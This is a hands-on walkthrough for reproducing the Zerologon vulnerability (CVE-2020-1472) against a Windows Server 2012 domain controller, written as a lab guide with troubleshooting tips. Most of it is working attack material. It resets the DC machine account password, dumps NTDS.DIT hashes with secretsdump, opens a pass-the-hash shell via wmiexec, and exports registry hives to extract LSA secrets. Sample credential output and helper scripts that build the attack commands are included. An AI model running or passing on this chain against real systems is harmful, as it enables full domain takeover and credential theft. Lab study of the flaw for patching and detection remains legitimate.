Environment

1. Attacker machine: Windows 10
2. Domain controller: Windows Server 2012, 192.168.139.147
3. Python 3.8
4. Reproduction tool: after a quick look, the available tools are all much the same; this one has the most detailed help text (although I still ran into plenty of pitfalls while reproducing): https://github.com/VoidSec/CVE-2020-1472

Reproduction flow

1. Check whether the DC is exploitable
2. Set the DC machine account password to empty
3. Restore the original DC machine account password

Step 2 changes the machine account password stored in Active Directory but not the copy the DC keeps locally in LSA, so the DC's own Netlogon and replication traffic breaks until step 3 is done. Only do this in a lab, and restore the password as soon as you have the hashes.

Pitfalls

1. Use the latest Impacket, v0.9.22.dev1+20200915.160006.1397e2b5; the released 0.9.21 lacks the NRPC structure the scripts need
2. When running the scripts on Linux, special characters such as the $ in the machine account name must be escaped; I ran everything on Windows and did not hit this
3. Mixing up the domain and the computer name leads to wrong parameters. Which one is the domain and which one is the computer name is shown in the figure below

[figure 1.png: where the domain name and the computer name of the DC are shown]

4. If the coloured output appears as garbled escape codes, add the following at the top of the script (on Windows 10 this call has the side effect of switching the console into ANSI escape-sequence processing):

import os
os.system("")  # side effect on the Windows 10 console: enables ANSI escape processing

About pitfall 1:
On Windows the Python launcher is available: py -3 pins Python 3, so you do not pick the wrong interpreter by accident.

Install Impacket manually for this step, and remove the line impacket==0.9.21 from requirements.txt; otherwise py -3 -m pip install -r requirements.txt installs Impacket again while pulling in the other libraries and overwrites the newer version.

Installation:
Uninstall the old version first:
py -3 -m pip uninstall impacket

Install the new version:
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
py -3 setup.py install

Error explanations

1. AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2': this is pitfall 1. NetrServerPasswordSet2 was only added to Impacket after the 0.9.21 release, so the installed copy is too old; install Impacket manually from git as described above.
2. secretsdump.py runs but returns no NTDS.DIT data: most likely the domain and the computer name are swapped, or the $ was not escaped. Check your parameters against the figure in pitfall 3.
3. [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.): same causes, the domain and the computer name are swapped or the $ was not escaped. Check against the figure in pitfall 3 that the parameters match your own environment. If they do, the password reset in the previous step did not actually succeed and the machine account password is not empty yet.
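The two environment problems above (an Impacket without NetrServerPasswordSet2, and colour codes printed as garbage on Windows) can be caught before any packet is sent. The following preflight script is an added example and is not part of the VoidSec repository or of Impacket; the function names are mine. It imports impacket.dcerpc.v5.nrpc and reports which of the NRPC names the exploit and restore scripts rely on are missing, and it enables ANSI processing on the Windows console through SetConsoleMode, which is what the os.system("") trick from pitfall 4 achieves as a side effect.

```python
"""Preflight for the Zerologon scripts: check the installed Impacket and fix
console colours. Added example, not code from the VoidSec repository."""
import ctypes
import importlib
import os
import sys

# NRPC names the exploit (ReqChallenge / Authenticate3) and the restore script
# (PasswordSet2) call into. Impacket 0.9.21 has no NetrServerPasswordSet2,
# which is exactly the AttributeError listed as error 1 above.
REQUIRED_NRPC_SYMBOLS = (
    "NetrServerReqChallenge",
    "NetrServerAuthenticate3",
    "NetrServerPasswordSet2",
    "hNetrServerPasswordSet2",
)


def check_impacket_zerologon_support() -> dict:
    """Describe the environment as {"python", "impacket", "missing", "ok"}.

    Never raises: a missing Impacket is reported as impacket=None with every
    required symbol listed as missing, so callers can print or assert on it.
    """
    result = {
        "python": "%d.%d.%d" % sys.version_info[:3],
        "impacket": None,
        "missing": list(REQUIRED_NRPC_SYMBOLS),
        "ok": False,
    }
    try:
        nrpc = importlib.import_module("impacket.dcerpc.v5.nrpc")
    except ImportError:
        return result
    try:
        # impacket/version.py carries the version string shown in the banner
        result["impacket"] = importlib.import_module("impacket.version").version
    except (ImportError, AttributeError):
        result["impacket"] = "unknown"
    result["missing"] = [n for n in REQUIRED_NRPC_SYMBOLS if not hasattr(nrpc, n)]
    result["ok"] = not result["missing"]
    return result


def enable_windows_vt_mode() -> bool:
    """Turn on ANSI escape processing for the current Windows console.

    Returns True once ENABLE_VIRTUAL_TERMINAL_PROCESSING is set, False on
    other platforms or when stdout is not a console (e.g. redirected to a file).
    """
    if os.name != "nt":
        return False
    ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004
    STD_OUTPUT_HANDLE = -11
    kernel32 = ctypes.windll.kernel32
    handle = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
    mode = ctypes.c_uint32()
    if not kernel32.GetConsoleMode(handle, ctypes.byref(mode)):
        return False
    return bool(kernel32.SetConsoleMode(handle, mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING))


if __name__ == "__main__":
    enable_windows_vt_mode()
    report = check_impacket_zerologon_support()
    print("Python %s, Impacket %s" % (report["python"], report["impacket"]))
    if report["ok"]:
        print("\x1b[32m[+] Impacket exposes every NRPC call the scripts need\x1b[0m")
    else:
        print("\x1b[31m[-] missing from impacket.dcerpc.v5.nrpc: %s\x1b[0m"
              % ", ".join(report["missing"]))
        print("    reinstall Impacket from git as described under pitfall 1")
        sys.exit(1)
```

Run it with py -3 before the exploit; a non-zero exit means the AttributeError from error 1 is waiting for you, and the fix is the manual install above, not editing the exploit script.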

Detection and exploitation

Regarding pitfall 3: this step takes the computer name of the DC (its NetBIOS name, without the trailing $), not the domain name

py -3 cve-2020-1472-exploit.py -n 2k12vitcim -t 192.168.139.147

Parameters:

-n  computer name of the DC (NetBIOS name, no trailing $)
-t  IP address of the DC

The script repeats the Netlogon authentication with an all-zero client challenge; each attempt succeeds with probability 1/256, so expect it to take a few hundred attempts before it reports success and resets the machine account password to empty.

Get the administrator NTLM hash

secretsdump.py -no-pass -just-dc DOMAIN/2k12vitcim$@192.168.139.147

Parameters:

-no-pass    do not prompt for a password (the machine account password is empty now)
-just-dc    extract only the NTDS.DIT data (NTLM hashes and Kerberos keys)
DOMAIN/2k12vitcim$@192.168.139.147    target in the form domain/computer-name$@dc-ip: replace DOMAIN with the domain's NetBIOS name from the figure in pitfall 3, 2k12vitcim$ is the DC's machine account (computer name plus $), and under a Linux shell the $ must be escaped as \$

Expected output:

Impacket v0.9.22.dev1+20200915.160006.1397e2b5 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
(remaining accounts omitted)
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:73ecb6feb447b5c734f1b6819b7dea3d91165f6d1c6fefc9169208c8548bfeaa
(remaining keys omitted)
[*] Cleaning up...

Get a shell on the DC and dump the DC machine account's original NT hash

Run the following to get a shell on the DC, passing the Administrator hash dumped above:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868 Administrator@192.168.139.147

Parameters:

-hashes  the domain administrator's hashes in the form lmhash:nthash (aad3b435b51404eeaad3b435b51404ee is the empty LM hash, the second value is the NT hash from the dump)
Administrator@192.168.139.147  username@dc-ip, the account whose hash is being passed

Then, in the shell you obtained, export the registry hives that hold the DC machine account's original password (the $MACHINE.ACC LSA secret lives in SECURITY and is protected with a key derived from SYSTEM), download them with wmiexec's built-in get command, and delete the copies from the DC:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

Run the following locally to get the DC machine account's original NT hash (and the raw password as hex):

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Expected output:

Impacket v0.9.22.dev1+20200915.160006.1397e2b5 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xb1a104ff3738f1a53c78e57a6662ea84
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8a8fea4a70166fae078958bf69441290
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6750d5c297f09dcbc8c595d3b578d1e6bcf99fd2
dpapi_userkey:0x7f509a6c59339522545664b4db73d393d15bd2e3
[*] NL$KM
0000   58 98 99 4F 48 70 C3 24  65 38 D0 73 05 8A 4F BA   X..OHp.$e8.s..O.
0010   F7 AD DC 33 DA E2 D3 2F  B7 4A 72 D6 C7 55 8A 90   ...3.../.Jr..U..
0020   59 52 74 40 99 77 FA D6  BF 4C 5A B7 A4 8B 43 DE   YRt@.w...LZ...C.
0030   E8 39 6F BA 39 D3 C6 DF  E4 3C 73 98 1E 23 DC 09   .9o.9....<s..#..
NL$KM:5898994f4870c3246538d073058a4fbaf7addc33dae2d32fb74a72d6c7558a90595274409977fad6bf4c5ab7a48b43dee8396fba39d3c6dfe43c73981e23dc09
[*] Cleaning up...

Restore the original DC machine account hash

Using the value after $MACHINE.ACC:plain_password_hex: from the previous step as the argument, run (arguments: DC computer name, DC IP, hex of the original password):

py -3 reinstall_original_pw.py 2k12vitcim 192.168.139.147 e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1

Expected output:

reinstall_original_pw.py 2k12vitcim 192.168.139.147 e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1
Performing authentication attempts...

======================================================================================================================================================================================================================================================================================================================================

NetrServerAuthenticate3Response
ServerCredential:
Data: b'\xde\xcfAaQ3\x1a*'
NegotiateFlags: 556793855
AccountRid: 1002
ErrorCode: 0

server challenge b'\xde\xa0\x10\x90\x15q\xc3t'
session key b'Us\xb2\xd9#\x8c\x132\x98Zv,\xb6\xb5S^'
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b'\x01\x14\xd2\xd0\x11\xb9\x02\xc4'
Timestamp: 0
ErrorCode: 0

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.
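The whole chain from the secretsdump.py output to the restore command is where the copy-and-paste mistakes from pitfalls 2 and 3 happen: a domain where the computer name belongs, a doubled or unescaped $, or a plain_password_hex value truncated while copying it out of the terminal. The following script is an added example, not part of the VoidSec repository or of Impacket; the function names are mine. It parses the two secretsdump.py outputs shown on this page (embedded as sample input, copied from the output above), validates the machine password blob before it is sent back to the DC, and builds the target string and restore command with the right shape for cmd.exe or bash.

```python
"""Extract what the restore step needs from secretsdump.py output and build
the follow-up commands. Added example, not code from the VoidSec repository."""
import re

# Sample input: the two secretsdump.py runs from this page, trimmed to the
# relevant lines (raw strings, since the banner contains a backslash).
SAMPLE_DC_DUMP = r"""Impacket v0.9.22.dev1+20200915.160006.1397e2b5 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:73ecb6feb447b5c734f1b6819b7dea3d91165f6d1c6fefc9169208c8548bfeaa
[*] Cleaning up...
"""

SAMPLE_LOCAL_DUMP = r"""[*] Target system bootKey: 0xb1a104ff3738f1a53c78e57a6662ea84
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8a8fea4a70166fae078958bf69441290
[*] Cleaning up...
"""

# uid:rid:lmhash:nthash::: lines (SAM dump and NTDS dump share this format)
HASH_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$", re.M)
MACHINE_HEX = re.compile(r"^\$MACHINE\.ACC:plain_password_hex:(?P<hex>[0-9a-fA-F]+)\s*$", re.M)
MACHINE_NT = re.compile(r"^\$MACHINE\.ACC: ?(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32})\s*$", re.M)


def parse_hashes(dump: str) -> dict:
    """Map account name -> (lmhash, nthash) for every hash line in the dump."""
    return {m["user"]: (m["lm"], m["nt"]) for m in HASH_LINE.finditer(dump)}


def parse_machine_account(dump: str) -> dict:
    """Return {"hex", "lm", "nt"} for the $MACHINE.ACC LSA secret of a LOCAL dump."""
    hex_match = MACHINE_HEX.search(dump)
    nt_match = MACHINE_NT.search(dump)
    if hex_match is None or nt_match is None:
        raise ValueError("no $MACHINE.ACC secret in dump; was -security passed?")
    return {"hex": hex_match["hex"].lower(), "lm": nt_match["lm"], "nt": nt_match["nt"]}


def check_machine_password_hex(hexpass: str, strict: bool = True) -> bytes:
    """Validate the blob before it goes to reinstall_original_pw.py.

    The machine password is stored as UTF-16LE, so the byte count must be even;
    a Windows-generated machine password is 120 UTF-16 code units (240 bytes).
    Anything else almost always means the value was truncated when copied.
    """
    try:
        raw = bytes.fromhex(hexpass)
    except ValueError as exc:
        raise ValueError("plain_password_hex is not valid hex") from exc
    if len(raw) % 2:
        raise ValueError("odd byte count, not UTF-16LE: value was truncated")
    if strict and len(raw) != 240:
        raise ValueError("expected 240 bytes, got %d: value was truncated" % len(raw))
    return raw


def secretsdump_target(domain: str, dc_name: str, dc_ip: str, shell: str = "cmd") -> str:
    """Build DOMAIN/DCNAME$@IP for 'secretsdump.py -no-pass -just-dc'.

    dc_name is the DC's computer name (the exploit's -n value), never the
    domain; a trailing $ is stripped so it cannot be doubled. Under a POSIX
    shell the $ is escaped, under cmd.exe it is passed through.
    """
    name = dc_name.rstrip("$")
    dollar = "\\$" if shell in ("bash", "sh", "zsh") else "$"
    return "%s/%s%s@%s" % (domain, name, dollar, dc_ip)


def restore_command(dc_name: str, dc_ip: str, hexpass: str) -> list:
    """argv for the restore step; validates the hex so a truncated blob never reaches the DC."""
    check_machine_password_hex(hexpass)
    return ["py", "-3", "reinstall_original_pw.py", dc_name.rstrip("$"), dc_ip, hexpass]


if __name__ == "__main__":
    admin_lm, admin_nt = parse_hashes(SAMPLE_DC_DUMP)["Administrator"]
    machine = parse_machine_account(SAMPLE_LOCAL_DUMP)
    print("secretsdump.py -no-pass -just-dc",
          secretsdump_target("DOMAIN", "2k12vitcim", "192.168.139.147", shell="bash"))
    print("wmiexec.py -hashes %s:%s Administrator@192.168.139.147" % (admin_lm, admin_nt))
    print(" ".join(restore_command("2k12vitcim", "192.168.139.147", machine["hex"])))
```

The strict 240-byte check is the one that matters in practice: a blob that lost even one byte on the way through the clipboard would be written to the DC as a new, wrong machine password, and the only way back would be a second Zerologon reset. Pass strict=False only if you know the lab DC's machine password was set by hand to a different length.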

Tags: CVE-2020-1472 reproduction pitfalls and error explanation guide
